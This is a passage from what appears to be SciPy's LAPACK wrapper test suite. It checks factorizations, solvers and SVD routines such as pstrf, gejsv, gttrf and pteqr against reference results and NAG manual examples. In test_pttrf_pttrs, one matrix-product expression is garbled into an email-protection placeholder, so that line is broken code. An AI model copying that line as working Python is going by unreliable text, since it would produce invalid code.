assert_allclose(Q @ R, np.concatenate((np.triu(A), B_pent)),
atol=tol, rtol=0.)
if ind > 1:
C = (rand(n, n) + rand(n, n)*1j).astype(dtype)
D = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transpose = 'C'
else:
C = (rand(n, n)).astype(dtype)
D = (rand(n, n)).astype(dtype)
transpose = 'T'
for side in ('L', 'R'):
for trans in ('N', transpose):
c, d, info = tpmqrt(l, b, t, C, D, side=side,
trans=trans)
assert(info == 0)
if trans == transpose:
q = Q.T.conj()
else:
q = Q
if side == 'L':
cd = np.concatenate((c, d), axis=0)
CD = np.concatenate((C, D), axis=0)
qCD = q @ CD
else:
cd = np.concatenate((c, d), axis=1)
CD = np.concatenate((C, D), axis=1)
qCD = CD @ q
assert_allclose(cd, qCD, atol=tol, rtol=0.)
if (side, trans) == ('L', 'N'):
c_default, d_default, info = tpmqrt(l, b, t, C, D)
assert(info == 0)
assert_equal(c_default, c)
assert_equal(d_default, d)
# Test invalid side/trans
assert_raises(Exception, tpmqrt, l, b, t, C, D, side='A')
assert_raises(Exception, tpmqrt, l, b, t, C, D, trans='A')
def test_pstrf():
seed(1234)
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s, d, c, z> pstrf
n = 10
r = 2
pstrf = get_lapack_funcs('pstrf', dtype=dtype)
# Create positive semidefinite A
if ind > 1:
A = rand(n, n-r).astype(dtype) + 1j * rand(n, n-r).astype(dtype)
A = A @ A.conj().T
else:
A = rand(n, n-r).astype(dtype)
A = A @ A.T
c, piv, r_c, info = pstrf(A)
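        # r_c is the rank detected by ?pstrf; the trailing n - r_c rows and
        # columns of the factor are not referenced, so zero them out before
        # comparing.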
U = triu(c)
U[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# python-dbg 3.5.2 runs cause trouble with the following assertion.
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], U.conj().T @ U, rtol=0., atol=atol)
c, piv, r_c, info = pstrf(A, lower=1)
L = tril(c)
L[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], L @ L.conj().T, rtol=0., atol=atol)
def test_pstf2():
seed(1234)
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s, d, c, z> pstf2
n = 10
r = 2
pstf2 = get_lapack_funcs('pstf2', dtype=dtype)
# Create positive semidefinite A
if ind > 1:
A = rand(n, n-r).astype(dtype) + 1j * rand(n, n-r).astype(dtype)
A = A @ A.conj().T
else:
A = rand(n, n-r).astype(dtype)
A = A @ A.T
c, piv, r_c, info = pstf2(A)
U = triu(c)
U[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# python-dbg 3.5.2 runs cause trouble with the commented assertions.
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], U.conj().T @ U, rtol=0., atol=atol)
c, piv, r_c, info = pstf2(A, lower=1)
L = tril(c)
L[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], L @ L.conj().T, rtol=0., atol=atol)
def test_geequ():
desired_real = np.array([[0.6250, 1.0000, 0.0393, -0.4269],
[1.0000, -0.5619, -1.0000, -1.0000],
[0.5874, -1.0000, -0.0596, -0.5341],
[-1.0000, -0.5946, -0.0294, 0.9957]])
desired_cplx = np.array([[-0.2816+0.5359*1j,
0.0812+0.9188*1j,
-0.7439-0.2561*1j],
[-0.3562-0.2954*1j,
0.9566-0.0434*1j,
-0.0174+0.1555*1j],
[0.8607+0.1393*1j,
-0.2759+0.7241*1j,
-0.1642-0.1365*1j]])
for ind, dtype in enumerate(DTYPES):
if ind < 2:
# Use examples from the NAG documentation
A = np.array([[1.80e+10, 2.88e+10, 2.05e+00, -8.90e+09],
[5.25e+00, -2.95e+00, -9.50e-09, -3.80e+00],
[1.58e+00, -2.69e+00, -2.90e-10, -1.04e+00],
[-1.11e+00, -6.60e-01, -5.90e-11, 8.00e-01]])
A = A.astype(dtype)
else:
A = np.array([[-1.34e+00, 0.28e+10, -6.39e+00],
[-1.70e+00, 3.31e+10, -0.15e+00],
[2.41e-10, -0.56e+00, -0.83e-10]], dtype=dtype)
A += np.array([[2.55e+00, 3.17e+10, -2.20e+00],
[-1.41e+00, -0.15e+10, 1.34e+00],
[0.39e-10, 1.47e+00, -0.69e-10]])*1j
A = A.astype(dtype)
geequ = get_lapack_funcs('geequ', dtype=dtype)
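        # ?geequ computes row (r) and column (c) scale factors chosen so the
        # largest element in each row and column of diag(r) @ A @ diag(c)
        # has magnitude close to one.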
r, c, rowcnd, colcnd, amax, info = geequ(A)
if ind < 2:
assert_allclose(desired_real.astype(dtype), r[:, None]*A*c,
rtol=0, atol=1e-4)
else:
assert_allclose(desired_cplx.astype(dtype), r[:, None]*A*c,
rtol=0, atol=1e-4)
def test_syequb():
desired_log2s = np.array([0, 0, 0, 0, 0, 0, -1, -1, -2, -3])
for ind, dtype in enumerate(DTYPES):
A = np.eye(10, dtype=dtype)
alpha = dtype(1. if ind < 2 else 1.j)
d = np.array([alpha * 2.**x for x in range(-5, 5)], dtype=dtype)
A += np.rot90(np.diag(d))
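        # np.rot90 turns the diagonal of powers of two into an antidiagonal,
        # producing rows of widely varying scale for ?syequb to equilibrate.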
syequb = get_lapack_funcs('syequb', dtype=dtype)
s, scond, amax, info = syequb(A)
assert_equal(np.log2(s).astype(int), desired_log2s)
@pytest.mark.skipif(True,
reason="Failing on some OpenBLAS version, see gh-12276")
def test_heequb():
    # zheequb has a bug for LAPACK versions <= 3.9.0
# See Reference-LAPACK gh-61 and gh-408
# Hence the zheequb test is customized accordingly to avoid
# work scaling.
A = np.diag([2]*5 + [1002]*5) + np.diag(np.ones(9), k=1)*1j
s, scond, amax, info = lapack.zheequb(A)
assert_equal(info, 0)
assert_allclose(np.log2(s), [0., -1.]*2 + [0.] + [-4]*5)
A = np.diag(2**np.abs(np.arange(-5, 6)) + 0j)
A[5, 5] = 1024
A[5, 0] = 16j
s, scond, amax, info = lapack.cheequb(A.astype(np.complex64), lower=1)
assert_equal(info, 0)
assert_allclose(np.log2(s), [-2, -1, -1, 0, 0, -5, 0, -1, -1, -2, -2])
def test_getc2_gesc2():
np.random.seed(42)
n = 10
desired_real = np.random.rand(n)
desired_cplx = np.random.rand(n) + np.random.rand(n)*1j
for ind, dtype in enumerate(DTYPES):
if ind < 2:
A = np.random.rand(n, n)
A = A.astype(dtype)
b = A @ desired_real
b = b.astype(dtype)
else:
A = np.random.rand(n, n) + np.random.rand(n, n)*1j
A = A.astype(dtype)
b = A @ desired_cplx
b = b.astype(dtype)
getc2 = get_lapack_funcs('getc2', dtype=dtype)
gesc2 = get_lapack_funcs('gesc2', dtype=dtype)
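        # ?getc2 computes an LU factorization with complete (row and column)
        # pivoting; ?gesc2 solves with it and returns a scale factor applied
        # to the solution to guard against overflow.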
lu, ipiv, jpiv, info = getc2(A, overwrite_a=0)
x, scale = gesc2(lu, b, ipiv, jpiv, overwrite_rhs=0)
if ind < 2:
assert_array_almost_equal(desired_real.astype(dtype),
x/scale, decimal=4)
else:
assert_array_almost_equal(desired_cplx.astype(dtype),
x/scale, decimal=4)
@pytest.mark.parametrize('size', [(6, 5), (5, 5)])
@pytest.mark.parametrize('dtype', REAL_DTYPES)
@pytest.mark.parametrize('joba', range(6)) # 'C', 'E', 'F', 'G', 'A', 'R'
@pytest.mark.parametrize('jobu', range(4)) # 'U', 'F', 'W', 'N'
@pytest.mark.parametrize('jobv', range(4)) # 'V', 'J', 'W', 'N'
@pytest.mark.parametrize('jobr', [0, 1])
@pytest.mark.parametrize('jobp', [0, 1])
def test_gejsv_general(size, dtype, joba, jobu, jobv, jobr, jobp, jobt=0):
"""Test the lapack routine ?gejsv.
This function tests that a singular value decomposition can be performed
on the random M-by-N matrix A. The test performs the SVD using ?gejsv
then performs the following checks:
    * ?gejsv exits successfully (info == 0)
* The returned singular values are correct
* `A` can be reconstructed from `u`, `SIGMA`, `v`
* Ensure that u.T @ u is the identity matrix
* Ensure that v.T @ v is the identity matrix
* The reported matrix rank
* The reported number of singular values
* If denormalized floats are required
Notes
-----
    joba specifies several choices affecting the calculation's accuracy
Although all arguments are tested, the tests only check that the correct
solution is returned - NOT that the prescribed actions are performed
internally.
    jobt is, as of v3.9.0, still experimental, so it is removed here to cut
    down the number of test cases. The keyword itself is tested separately.
"""
seed(42)
# Define some constants for later use:
m, n = size
atol = 100 * np.finfo(dtype).eps
A = generate_random_dtype_array(size, dtype)
gejsv = get_lapack_funcs('gejsv', dtype=dtype)
# Set up checks for invalid job? combinations
# if an invalid combination occurs we set the appropriate
# exit status.
lsvec = jobu < 2 # Calculate left singular vectors
rsvec = jobv < 2 # Calculate right singular vectors
l2tran = (jobt == 1) and (m == n)
is_complex = np.iscomplexobj(A)
invalid_real_jobv = (jobv == 1) and (not lsvec) and (not is_complex)
invalid_cplx_jobu = (jobu == 2) and not (rsvec and l2tran) and is_complex
invalid_cplx_jobv = (jobv == 2) and not (lsvec and l2tran) and is_complex
# Set the exit status to the expected value.
# Here we only check for invalid combinations, not individual
# parameters.
if invalid_cplx_jobu:
exit_status = -2
elif invalid_real_jobv or invalid_cplx_jobv:
exit_status = -3
else:
exit_status = 0
if (jobu > 1) and (jobv == 1):
assert_raises(Exception, gejsv, A, joba, jobu, jobv, jobr, jobt, jobp)
else:
sva, u, v, work, iwork, info = gejsv(A,
joba=joba,
jobu=jobu,
jobv=jobv,
jobr=jobr,
jobt=jobt,
jobp=jobp)
# Check that ?gejsv exited successfully/as expected
assert_equal(info, exit_status)
# If exit_status is non-zero the combination of jobs is invalid.
# We test this above but no calculations are performed.
if not exit_status:
# Check the returned singular values
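            # ?gejsv may return the singular values scaled; per the LAPACK
            # docs the ratio work[0]/work[1] restores the true values.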
sigma = (work[0] / work[1]) * sva[:n]
assert_allclose(sigma, svd(A, compute_uv=False), atol=atol)
if jobu == 1:
# If JOBU = 'F', then u contains the M-by-M matrix of
# the left singular vectors, including an ONB of the orthogonal
# complement of the Range(A)
# However, to recalculate A we are concerned about the
# first n singular values and so can ignore the latter.
# TODO: Add a test for ONB?
u = u[:, :n]
if lsvec and rsvec:
assert_allclose(u @ np.diag(sigma) @ v.conj().T, A, atol=atol)
if lsvec:
assert_allclose(u.conj().T @ u, np.identity(n), atol=atol)
if rsvec:
assert_allclose(v.conj().T @ v, np.identity(n), atol=atol)
assert_equal(iwork[0], np.linalg.matrix_rank(A))
assert_equal(iwork[1], np.count_nonzero(sigma))
# iwork[2] is non-zero if requested accuracy is not warranted for
# the data. This should never occur for these tests.
assert_equal(iwork[2], 0)
@pytest.mark.parametrize('dtype', REAL_DTYPES)
def test_gejsv_edge_arguments(dtype):
"""Test edge arguments return expected status"""
gejsv = get_lapack_funcs('gejsv', dtype=dtype)
# scalar A
sva, u, v, work, iwork, info = gejsv(1.)
assert_equal(info, 0)
assert_equal(u.shape, (1, 1))
assert_equal(v.shape, (1, 1))
assert_equal(sva, np.array([1.], dtype=dtype))
# 1d A
A = np.ones((1,), dtype=dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_equal(info, 0)
assert_equal(u.shape, (1, 1))
assert_equal(v.shape, (1, 1))
assert_equal(sva, np.array([1.], dtype=dtype))
# 2d empty A
A = np.ones((1, 0), dtype=dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_equal(info, 0)
assert_equal(u.shape, (1, 0))
assert_equal(v.shape, (1, 0))
assert_equal(sva, np.array([], dtype=dtype))
# make sure "overwrite_a" is respected - user reported in gh-13191
A = np.sin(np.arange(100).reshape(10, 10)).astype(dtype)
A = np.asfortranarray(A + A.T) # make it symmetric and column major
Ac = A.copy('A')
_ = gejsv(A)
assert_allclose(A, Ac)
@pytest.mark.parametrize(('kwargs'),
({'joba': 9},
{'jobu': 9},
{'jobv': 9},
{'jobr': 9},
{'jobt': 9},
{'jobp': 9})
)
def test_gejsv_invalid_job_arguments(kwargs):
"""Test invalid job arguments raise an Exception"""
A = np.ones((2, 2), dtype=float)
gejsv = get_lapack_funcs('gejsv', dtype=float)
assert_raises(Exception, gejsv, A, **kwargs)
@pytest.mark.parametrize("A,sva_expect,u_expect,v_expect",
[(np.array([[2.27, -1.54, 1.15, -1.94],
[0.28, -1.67, 0.94, -0.78],
[-0.48, -3.09, 0.99, -0.21],
[1.07, 1.22, 0.79, 0.63],
[-2.35, 2.93, -1.45, 2.30],
[0.62, -7.39, 1.03, -2.57]]),
np.array([9.9966, 3.6831, 1.3569, 0.5000]),
np.array([[0.2774, -0.6003, -0.1277, 0.1323],
[0.2020, -0.0301, 0.2805, 0.7034],
[0.2918, 0.3348, 0.6453, 0.1906],
[-0.0938, -0.3699, 0.6781, -0.5399],
[-0.4213, 0.5266, 0.0413, -0.0575],
[0.7816, 0.3353, -0.1645, -0.3957]]),
np.array([[0.1921, -0.8030, 0.0041, -0.5642],
[-0.8794, -0.3926, -0.0752, 0.2587],
[0.2140, -0.2980, 0.7827, 0.5027],
[-0.3795, 0.3351, 0.6178, -0.6017]]))])
def test_gejsv_NAG(A, sva_expect, u_expect, v_expect):
"""
This test implements the example found in the NAG manual, f08khf.
An example was not found for the complex case.
"""
# NAG manual provides accuracy up to 4 decimals
atol = 1e-4
gejsv = get_lapack_funcs('gejsv', dtype=A.dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_allclose(sva_expect, sva, atol=atol)
assert_allclose(u_expect, u, atol=atol)
assert_allclose(v_expect, v, atol=atol)
@pytest.mark.parametrize("dtype", DTYPES)
def test_gttrf_gttrs(dtype):
# The test uses ?gttrf and ?gttrs to solve a random system for each dtype,
    # tests that the outputs of ?gttrf define an LU factorization, that input
    # parameters are unmodified, that transpose options function correctly,
    # that incompatible matrix shapes raise an error, and that singular
    # matrices return non-zero info.
seed(42)
n = 10
atol = 100 * np.finfo(dtype).eps
# create the matrix in accordance with the data type
du = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
dl = generate_random_dtype_array((n-1,), dtype=dtype)
diag_cpy = [dl.copy(), d.copy(), du.copy()]
A = np.diag(d) + np.diag(dl, -1) + np.diag(du, 1)
x = np.random.rand(n)
b = A @ x
gttrf, gttrs = get_lapack_funcs(('gttrf', 'gttrs'), dtype=dtype)
_dl, _d, _du, du2, ipiv, info = gttrf(dl, d, du)
# test to assure that the inputs of ?gttrf are unmodified
assert_array_equal(dl, diag_cpy[0])
assert_array_equal(d, diag_cpy[1])
assert_array_equal(du, diag_cpy[2])
# generate L and U factors from ?gttrf return values
# L/U are lower/upper triangular by construction (initially and at end)
U = np.diag(_d, 0) + np.diag(_du, 1) + np.diag(du2, 2)
L = np.eye(n, dtype=dtype)
for i, m in enumerate(_dl):
# L is given in a factored form.
# See
# www.hpcavf.uclan.ac.uk/softwaredoc/sgi_scsl_html/sgi_html/ch03.html
piv = ipiv[i] - 1
# right multiply by permutation matrix
L[:, [i, piv]] = L[:, [piv, i]]
# right multiply by Li, rank-one modification of identity
L[:, i] += L[:, i+1]*m
# one last permutation
i, piv = -1, ipiv[-1] - 1
# right multiply by final permutation matrix
L[:, [i, piv]] = L[:, [piv, i]]
# check that the outputs of ?gttrf define an LU decomposition of A
assert_allclose(A, L @ U, atol=atol)
b_cpy = b.copy()
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b)
# test that the inputs of ?gttrs are unmodified
assert_array_equal(b, b_cpy)
# test that the result of ?gttrs matches the expected input
assert_allclose(x, x_gttrs, atol=atol)
# test that ?gttrf and ?gttrs work with transposal options
if dtype in REAL_DTYPES:
trans = "T"
b_trans = A.T @ x
else:
trans = "C"
b_trans = A.conj().T @ x
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b_trans, trans=trans)
assert_allclose(x, x_gttrs, atol=atol)
# test that ValueError is raised with incompatible matrix shapes
with assert_raises(ValueError):
gttrf(dl[:-1], d, du)
with assert_raises(ValueError):
gttrf(dl, d[:-1], du)
with assert_raises(ValueError):
gttrf(dl, d, du[:-1])
    # test that a matrix of size n=1 raises an exception
with assert_raises(Exception):
gttrf(dl[0], d[:1], du[0])
# test that singular (row of all zeroes) matrix fails via info
du[0] = 0
d[0] = 0
__dl, __d, __du, _du2, _ipiv, _info = gttrf(dl, d, du)
    np.testing.assert_(__d[_info - 1] == 0,
                       "?gttrf: _d[info-1] is {}, not the expected illegal "
                       "value 0.".format(__d[_info - 1]))
@pytest.mark.parametrize("du, d, dl, du_exp, d_exp, du2_exp, ipiv_exp, b, x",
[(np.array([2.1, -1.0, 1.9, 8.0]),
np.array([3.0, 2.3, -5.0, -.9, 7.1]),
np.array([3.4, 3.6, 7.0, -6.0]),
np.array([2.3, -5, -.9, 7.1]),
np.array([3.4, 3.6, 7, -6, -1.015373]),
np.array([-1, 1.9, 8]),
np.array([2, 3, 4, 5, 5]),
np.array([[2.7, 6.6],
[-0.5, 10.8],
[2.6, -3.2],
[0.6, -11.2],
[2.7, 19.1]
]),
np.array([[-4, 5],
[7, -4],
[3, -3],
[-4, -2],
[-3, 1]])),
(
np.array([2 - 1j, 2 + 1j, -1 + 1j, 1 - 1j]),
np.array([-1.3 + 1.3j, -1.3 + 1.3j,
-1.3 + 3.3j, - .3 + 4.3j,
-3.3 + 1.3j]),
np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j]),
# du exp
np.array([-1.3 + 1.3j, -1.3 + 3.3j,
-0.3 + 4.3j, -3.3 + 1.3j]),
np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j,
-1.3399 + 0.2875j]),
np.array([2 + 1j, -1 + 1j, 1 - 1j]),
np.array([2, 3, 4, 5, 5]),
np.array([[2.4 - 5j, 2.7 + 6.9j],
[3.4 + 18.2j, - 6.9 - 5.3j],
[-14.7 + 9.7j, - 6 - .6j],
[31.9 - 7.7j, -3.9 + 9.3j],
[-1 + 1.6j, -3 + 12.2j]]),
np.array([[1 + 1j, 2 - 1j],
[3 - 1j, 1 + 2j],
[4 + 5j, -1 + 1j],
[-1 - 2j, 2 + 1j],
[1 - 1j, 2 - 2j]])
)])
def test_gttrf_gttrs_NAG_f07cdf_f07cef_f07crf_f07csf(du, d, dl, du_exp, d_exp,
du2_exp, ipiv_exp, b, x):
# test to assure that wrapper is consistent with NAG Library Manual Mark 26
# example problems: f07cdf and f07cef (real)
# examples: f07crf and f07csf (complex)
# (Links may expire, so search for "NAG Library Manual Mark 26" online)
gttrf, gttrs = get_lapack_funcs(('gttrf', "gttrs"), (du[0], du[0]))
_dl, _d, _du, du2, ipiv, info = gttrf(dl, d, du)
assert_allclose(du2, du2_exp)
assert_allclose(_du, du_exp)
assert_allclose(_d, d_exp, atol=1e-4) # NAG examples provide 4 decimals.
assert_allclose(ipiv, ipiv_exp)
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b)
assert_allclose(x_gttrs, x)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('shape', [(3, 7), (7, 3), (2**18, 2**18)])
def test_geqrfp_lwork(dtype, shape):
geqrfp_lwork = get_lapack_funcs(('geqrfp_lwork'), dtype=dtype)
m, n = shape
lwork, info = geqrfp_lwork(m=m, n=n)
assert_equal(info, 0)
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs(ddtype, dtype):
seed(42)
# set test tolerance appropriate for dtype
atol = 100*np.finfo(dtype).eps
    # n is the length of the diagonal of A
n = 10
# create diagonals according to size and dtype
# diagonal d should always be real.
# add 4 to d so it will be dominant for all dtypes
d = generate_random_dtype_array((n,), ddtype) + 4
# diagonal e may be real or complex.
e = generate_random_dtype_array((n-1,), dtype)
# assemble diagonals together into matrix
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
# store a copy of diagonals to later verify
diag_cpy = [d.copy(), e.copy()]
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
_d, _e, info = pttrf(d, e)
# test to assure that the inputs of ?pttrf are unmodified
assert_array_equal(d, diag_cpy[0])
assert_array_equal(e, diag_cpy[1])
assert_equal(info, 0, err_msg="pttrf: info = {}, should be 0".format(info))
# test that the factors from pttrf can be recombined to make A
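    # ?pttrf computes A = L @ D @ L^H with unit lower-bidiagonal L
    # (subdiagonal _e) and real diagonal D (_d).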
L = np.diag(_e, -1) + np.diag(np.ones(n))
D = np.diag(_d)
assert_allclose(A, L@[email protected]().T, atol=atol)
# generate random solution x
x = generate_random_dtype_array((n,), dtype)
# determine accompanying b to get soln x
b = A@x
# determine _x from pttrs
pttrs = get_lapack_funcs('pttrs', dtype=dtype)
_x, info = pttrs(_d, _e.conj(), b)
assert_equal(info, 0, err_msg="pttrs: info = {}, should be 0".format(info))
# test that _x from pttrs matches the expected x
assert_allclose(x, _x, atol=atol)
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs_errors_incompatible_shape(ddtype, dtype):
n = 10
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
d = generate_random_dtype_array((n,), ddtype) + 2
e = generate_random_dtype_array((n-1,), dtype)
# test that ValueError is raised with incompatible matrix shapes
assert_raises(ValueError, pttrf, d[:-1], e)
assert_raises(ValueError, pttrf, d, e[:-1])
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs_errors_singular_nonSPD(ddtype, dtype):
n = 10
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
d = generate_random_dtype_array((n,), ddtype) + 2
e = generate_random_dtype_array((n-1,), dtype)
# test that singular (row of all zeroes) matrix fails via info
d[0] = 0
e[0] = 0
_d, _e, info = pttrf(d, e)
    assert_equal(_d[info - 1], 0,
                 "?pttrf: _d[info-1] is {}, not the expected illegal "
                 "value 0.".format(_d[info - 1]))
# test with non-spd matrix
d = generate_random_dtype_array((n,), ddtype)
_d, _e, info = pttrf(d, e)
assert_(info != 0, "?pttrf should fail with non-spd matrix, but didn't")
@pytest.mark.parametrize(("d, e, d_expect, e_expect, b, x_expect"), [
(np.array([4, 10, 29, 25, 5]),
np.array([-2, -6, 15, 8]),
np.array([4, 9, 25, 16, 1]),
np.array([-.5, -.6667, .6, .5]),
np.array([[6, 10], [9, 4], [2, 9], [14, 65],
[7, 23]]),
np.array([[2.5, 2], [2, -1], [1, -3], [-1, 6],
[3, -5]])
), (
np.array([16, 41, 46, 21]),
np.array([16 + 16j, 18 - 9j, 1 - 4j]),
np.array([16, 9, 1, 4]),
np.array([1+1j, 2-1j, 1-4j]),
np.array([[64+16j, -16-32j], [93+62j, 61-66j],
[78-80j, 71-74j], [14-27j, 35+15j]]),
np.array([[2+1j, -3-2j], [1+1j, 1+1j], [1-2j, 1-2j],
[1-1j, 2+1j]])
)])
def test_pttrf_pttrs_NAG(d, e, d_expect, e_expect, b, x_expect):
# test to assure that wrapper is consistent with NAG Manual Mark 26
# example problems: f07jdf and f07jef (real)
    # examples: f07jrf and f07jsf (complex)
# NAG examples provide 4 decimals.
# (Links expire, so please search for "NAG Library Manual Mark 26" online)
atol = 1e-4
pttrf = get_lapack_funcs('pttrf', dtype=e[0])
_d, _e, info = pttrf(d, e)
assert_allclose(_d, d_expect, atol=atol)
assert_allclose(_e, e_expect, atol=atol)
pttrs = get_lapack_funcs('pttrs', dtype=e[0])
_x, info = pttrs(_d, _e.conj(), b)
assert_allclose(_x, x_expect, atol=atol)
# also test option `lower`
if e.dtype in COMPLEX_DTYPES:
_x, info = pttrs(_d, _e, b, lower=1)
assert_allclose(_x, x_expect, atol=atol)
def pteqr_get_d_e_A_z(dtype, realtype, n, compute_z):
# used by ?pteqr tests to build parameters
# returns tuple of (d, e, A, z)
if compute_z == 1:
# build Hermitian A from Q**T * tri * Q = A by creating Q and tri
A_eig = generate_random_dtype_array((n, n), dtype)
A_eig = A_eig + np.diag(np.zeros(n) + 4*n)
A_eig = (A_eig + A_eig.conj().T) / 2
# obtain right eigenvectors (orthogonal)
vr = eigh(A_eig)[1]
# create tridiagonal matrix
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), realtype)
tri = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
        # Build A from these factors as ?sytrd would: A = Q @ tri @ Q^H
A = vr @ tri @ vr.conj().T
# vr is orthogonal
z = vr
else:
# d and e are always real per lapack docs.
d = generate_random_dtype_array((n,), realtype)
e = generate_random_dtype_array((n-1,), realtype)
# make SPD
d = d + 4
A = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
z = np.diag(d) + np.diag(e, -1) + np.diag(e, 1)
return (d, e, A, z)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr(dtype, realtype, compute_z):
'''
Tests the ?pteqr lapack routine for all dtypes and compute_z parameters.
It generates random SPD matrix diagonals d and e, and then confirms
    correct eigenvalues with scipy.linalg.eigh. When compute_z is nonzero it
    also tests that z is orthogonal and can reform A.
'''
seed(42)
atol = 1000*np.finfo(dtype).eps
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d=d, e=e, z=z, compute_z=compute_z)
assert_equal(info, 0, "info = {}, should be 0.".format(info))
# compare the routine's eigenvalues with scipy.linalg.eig's.
assert_allclose(np.sort(eigh(A)[0]), np.sort(d_pteqr), atol=atol)
if compute_z:
# verify z_pteqr as orthogonal
assert_allclose(z_pteqr @ np.conj(z_pteqr).T, np.identity(n),
atol=atol)
# verify that z_pteqr recombines to A
assert_allclose(z_pteqr @ np.diag(d_pteqr) @ np.conj(z_pteqr).T,
A, atol=atol)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_error_non_spd(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with non-spd matrix
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d - 4, e, z=z, compute_z=compute_z)
assert info > 0
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_raise_error_wrong_shape(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with incorrect/incompatible array sizes
assert_raises(ValueError, pteqr, d[:-1], e, z=z, compute_z=compute_z)
assert_raises(ValueError, pteqr, d, e[:-1], z=z, compute_z=compute_z)
if compute_z:
assert_raises(ValueError, pteqr, d, e, z=z[:-1], compute_z=compute_z)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_error_singular(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with singular matrix
d[0] = 0
e[0] = 0
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d, e, z=z, compute_z=compute_z)
assert info > 0
@pytest.mark.parametrize("compute_z,d,e,d_expect,z_expect",
[(2, # "I"
np.array([4.16, 5.25, 1.09, .62]),
np.array([3.17, -.97, .55]),
np.array([8.0023, 1.9926, 1.0014, 0.1237]),
np.array([[0.6326, 0.6245, -0.4191, 0.1847],
[0.7668, -0.4270, 0.4176, -0.2352],
[-0.1082, 0.6071, 0.4594, -0.6393],
[-0.0081, 0.2432, 0.6625, 0.7084]])),
])
def test_pteqr_NAG_f08jgf(compute_z, d, e, d_expect, z_expect):
'''
Implements real (f08jgf) example from NAG Manual Mark 26.
Tests for correct outputs.
'''
# the NAG manual has 4 decimals accuracy
atol = 1e-4
pteqr = get_lapack_funcs(('pteqr'), dtype=d.dtype)
z = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
_d, _e, _z, info = pteqr(d=d, e=e, z=z, compute_z=compute_z)
assert_allclose(_d, d_expect, atol=atol)
assert_allclose(np.abs(_z), np.abs(z_expect), atol=atol)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('matrix_size', [(3, 4), (7, 6), (6, 6)])
def test_geqrfp(dtype, matrix_size):
    # Tests for all dtypes, and for tall, wide, and square matrices.
    # Using the routine with a random matrix A, Q and R are obtained and then
    # tested such that R is upper triangular and non-negative on the diagonal,
    # and Q is an orthogonal matrix. Verifies that A = Q @ R. It also
    # tests against a matrix for which scipy.linalg.qr returns
    # negative diagonals, and for error messaging.
# set test tolerance appropriate for dtype
np.random.seed(42)
rtol = 250*np.finfo(dtype).eps
atol = 100*np.finfo(dtype).eps
# get appropriate ?geqrfp for dtype
